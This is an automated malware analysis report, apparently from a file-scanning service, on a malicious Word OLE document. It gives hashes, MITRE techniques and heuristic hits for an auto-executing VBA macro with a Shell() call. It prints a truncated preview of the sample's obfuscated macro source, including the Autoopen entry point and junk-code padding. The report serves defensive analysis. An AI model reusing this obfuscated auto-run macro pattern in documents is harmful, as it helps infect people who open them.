Office (OLE) malware analysis — malicious · 6f6acb726082ac20

MALICIOUS

Office (OLE)

172.5 KB Created: 2018-04-27 13:28:00 Authoring application: Microsoft Office Word First seen: 2019-09-30

MD5: d9482f21b17bd41abbdfbea933303f48 SHA-1: 4febc0601f2af0350b5980b0048671b714c19d57 SHA-256: 6f6acb726082ac203a58c274063873fc0faeabb9d40b6b4af9808ff17cda979d

142 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1203 Exploitation for Client Execution

The sample is a Microsoft Office document containing a VBA macro. The critical heuristic firing indicates the presence of a Shell() call within the VBA code, which is commonly used to execute arbitrary commands or download and run additional payloads. The AutoOpen macro marker further suggests that this malicious code is designed to execute automatically upon opening the document. The obfuscated nature of the script prevents a more detailed analysis of its specific actions.

Heuristics 5

VBA macros detected medium 2 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 54190 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	54190 bytes
SHA-256: `06371d1f77be79d8def50fdc3f39bb0f05820c7b453441e0ce538d5345d045f6`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "RdQYzjkwruGrz" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Sub AzbzJT(awJKqG) Select Case FJfMr Case 97446 zWODGi = FHoAlA uftoin = Round(65794) VtUjS = Hex(BlwrAM - ChrW(cMtDk)) VqVJE = aKilY Case 24792 CbBVj = CByte(48418) mEWrJ = Log(opSSAl) End Select End Sub Sub ZNhzjP(siWzYi) Select Case JZbrJd Case 41159 QTdATQ = sMlnTl tBlUzX = Round(7505) XTfvfQ = Hex(aqHYww - ChrW(WjwLH)) KNlLDT = ZGpjzY Case 66519 KVXlUB = CByte(71755) fvpsjf = Log(XmQNX) End Select Select Case hUsLk Case 32463 BaaYO = LOYam ZTFPOa = Round(98710) ERthKL = Hex(dAiZkk - ChrW(tEUQi)) TnwMd = wqbEi Case 70591 WPjhsN = CByte(5552) iNuACE = Log(aBvzw) End Select Select Case aRShEm Case 25172 BwAowO = JXcDb lZELaU = Round(80163) aIjoA = Hex(wQzobp - ChrW(jQtLDq)) QdSuU = prOVd Case 34915 jaoUA = CByte(95874) CtXob = Log(BEILAX) End Select End Sub Sub izzplU(FGCiK) Select Case SCFcZ Case 22205 XFXFi = iwkjC Gophd = Round(96172) fzNvqt = Hex(STzzjm - ChrW(QHcbrL)) mBVXz = EVdVc Case 58968 fIJJjM = CByte(3486) OzlCQj = Log(jMFlmO) End Select Select Case vrYrkY Case 95622 iXBvII = TufJTX kUjcP = Round(77143) Pqrbl = Hex(Slpbd - ChrW(XVOBU)) hjtKG = vVtHDI Case 14443 JaOhJ = CByte(37850) viiFD = Log(RzjWTO) End Select End Sub Sub Autoopen() On Error Resume Next Select Case iEXFj Case 27257 QTLhhU = szHhr AmFLF = Round(4776) dWMlkt = Hex(aFDIz - ChrW(nGbTBY)) LYCZpb = EwzLA Case 63847 CtHZw = CByte(76641) tnuwj = Log(NtKlKh) End Select CtEiJlhrij (mFTmw + iPhOuWwc + jziGr) Select Case QfkMT Case 87906 kRSlI = FfzLlN TOiza = Round(39589) nHUOjC = Hex(TQdjrr - ChrW(wBTTL)) qdjmt = ppCAnm Case 98275 RcwEE = CByte(10629) mOWitV = Log(WMKiPI) End Select End Sub Sub JaiUnN(RQqtsb) Select Case UEPOFZ Case 8985 KHAXt = ppIXq HBOjQs = Round(72576) wjkBt = Hex(BIvPJ - ChrW(hvQaUQ)) jcahW = wjSpf Case 94868 ojQiW = CByte(97123) kRjusN = Log(vMloP) End Select Select Case YFsXz Case 27483 vcjSPS = uwilEV jOvjoI = Round(90537) ThBQw = Hex(iqsfIw - ChrW(IiOiaR)) zhzjt = oqzrK Case 11012 sIBQz = CByte(42012) MHmGv = Log(EbjhB) End Select Select Case qjFmi Case 34196 iAstA = Cupzj fELAqv = Round(86071) WKNKQq = Hex(PVnWTz - ChrW(nGTOlm)) cObzjW = fjPqp Case 56881 YmicKX = CByte(76014) BdNzC = Log(EjcJG) End Select End Sub Sub uvmKjU(jmYfiV) Select Case OTklbP Case 10649 MzlmT = aCnhii dAXwp = Round(67801) mdzjc = Hex(Clvqhr - ChrW(rjoYuB)) Ijlwvn = lSNol Case 61175 QjzCJ = CByte(86508) pGwzrs = Log(uMwBo) End Select End Sub Attribute VB_Name = "vCrznpCRSiCvL" Sub aAoWkI(SdpwE) Select Case JrGOmw Case 85894 NrAPU = XXYuDf nuXcR = Round(62947) cZCAju = Hex(aLUPwS - ChrW(NIoGQS)) vFvvYp = zjlVQ ... (truncated)

SHA-256: 06371d1f77be79d8def50fdc3f39bb0f05820c7b453441e0ce538d5345d045f6

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "RdQYzjkwruGrz"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AzbzJT(awJKqG)
Select Case FJfMr
         Case 97446
            zWODGi = FHoAlA
            uftoin = Round(65794)
            VtUjS = Hex(BlwrAM - ChrW(cMtDk))
            VqVJE = aKilY
         Case 24792
            CbBVj = CByte(48418)
            mEWrJ = Log(opSSAl)
End Select
End Sub
Sub ZNhzjP(siWzYi)
Select Case JZbrJd
         Case 41159
            QTdATQ = sMlnTl
            tBlUzX = Round(7505)
            XTfvfQ = Hex(aqHYww - ChrW(WjwLH))
            KNlLDT = ZGpjzY
         Case 66519
            KVXlUB = CByte(71755)
            fvpsjf = Log(XmQNX)
End Select
Select Case hUsLk
         Case 32463
            BaaYO = LOYam
            ZTFPOa = Round(98710)
            ERthKL = Hex(dAiZkk - ChrW(tEUQi))
            TnwMd = wqbEi
         Case 70591
            WPjhsN = CByte(5552)
            iNuACE = Log(aBvzw)
End Select
Select Case aRShEm
         Case 25172
            BwAowO = JXcDb
            lZELaU = Round(80163)
            aIjoA = Hex(wQzobp - ChrW(jQtLDq))
            QdSuU = prOVd
         Case 34915
            jaoUA = CByte(95874)
            CtXob = Log(BEILAX)
End Select
End Sub
Sub izzplU(FGCiK)
Select Case SCFcZ
         Case 22205
            XFXFi = iwkjC
            Gophd = Round(96172)
            fzNvqt = Hex(STzzjm - ChrW(QHcbrL))
            mBVXz = EVdVc
         Case 58968
            fIJJjM = CByte(3486)
            OzlCQj = Log(jMFlmO)
End Select
Select Case vrYrkY
         Case 95622
            iXBvII = TufJTX
            kUjcP = Round(77143)
            Pqrbl = Hex(Slpbd - ChrW(XVOBU))
            hjtKG = vVtHDI
         Case 14443
            JaOhJ = CByte(37850)
            viiFD = Log(RzjWTO)
End Select
End Sub
Sub Autoopen()
On Error Resume Next
Select Case iEXFj
         Case 27257
            QTLhhU = szHhr
            AmFLF = Round(4776)
            dWMlkt = Hex(aFDIz - ChrW(nGbTBY))
            LYCZpb = EwzLA
         Case 63847
            CtHZw = CByte(76641)
            tnuwj = Log(NtKlKh)
End Select
CtEiJlhrij (mFTmw + iPhOuWwc + jziGr)
Select Case QfkMT
         Case 87906
            kRSlI = FfzLlN
            TOiza = Round(39589)
            nHUOjC = Hex(TQdjrr - ChrW(wBTTL))
            qdjmt = ppCAnm
         Case 98275
            RcwEE = CByte(10629)
            mOWitV = Log(WMKiPI)
End Select
End Sub
Sub JaiUnN(RQqtsb)
Select Case UEPOFZ
         Case 8985
            KHAXt = ppIXq
            HBOjQs = Round(72576)
            wjkBt = Hex(BIvPJ - ChrW(hvQaUQ))
            jcahW = wjSpf
         Case 94868
            ojQiW = CByte(97123)
            kRjusN = Log(vMloP)
End Select
Select Case YFsXz
         Case 27483
            vcjSPS = uwilEV
            jOvjoI = Round(90537)
            ThBQw = Hex(iqsfIw - ChrW(IiOiaR))
            zhzjt = oqzrK
         Case 11012
            sIBQz = CByte(42012)
            MHmGv = Log(EbjhB)
End Select
Select Case qjFmi
         Case 34196
            iAstA = Cupzj
            fELAqv = Round(86071)
            WKNKQq = Hex(PVnWTz - ChrW(nGTOlm))
            cObzjW = fjPqp
         Case 56881
            YmicKX = CByte(76014)
            BdNzC = Log(EjcJG)
End Select
End Sub
Sub uvmKjU(jmYfiV)
Select Case OTklbP
         Case 10649
            MzlmT = aCnhii
            dAXwp = Round(67801)
            mdzjc = Hex(Clvqhr - ChrW(rjoYuB))
            Ijlwvn = lSNol
         Case 61175
            QjzCJ = CByte(86508)
            pGwzrs = Log(uMwBo)
End Select
End Sub

Attribute VB_Name = "vCrznpCRSiCvL"
Sub aAoWkI(SdpwE)
Select Case JrGOmw
         Case 85894
            NrAPU = XXYuDf
            nuXcR = Round(62947)
            cZCAju = Hex(aLUPwS - ChrW(NIoGQS))
            vFvvYp = zjlVQ
   
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.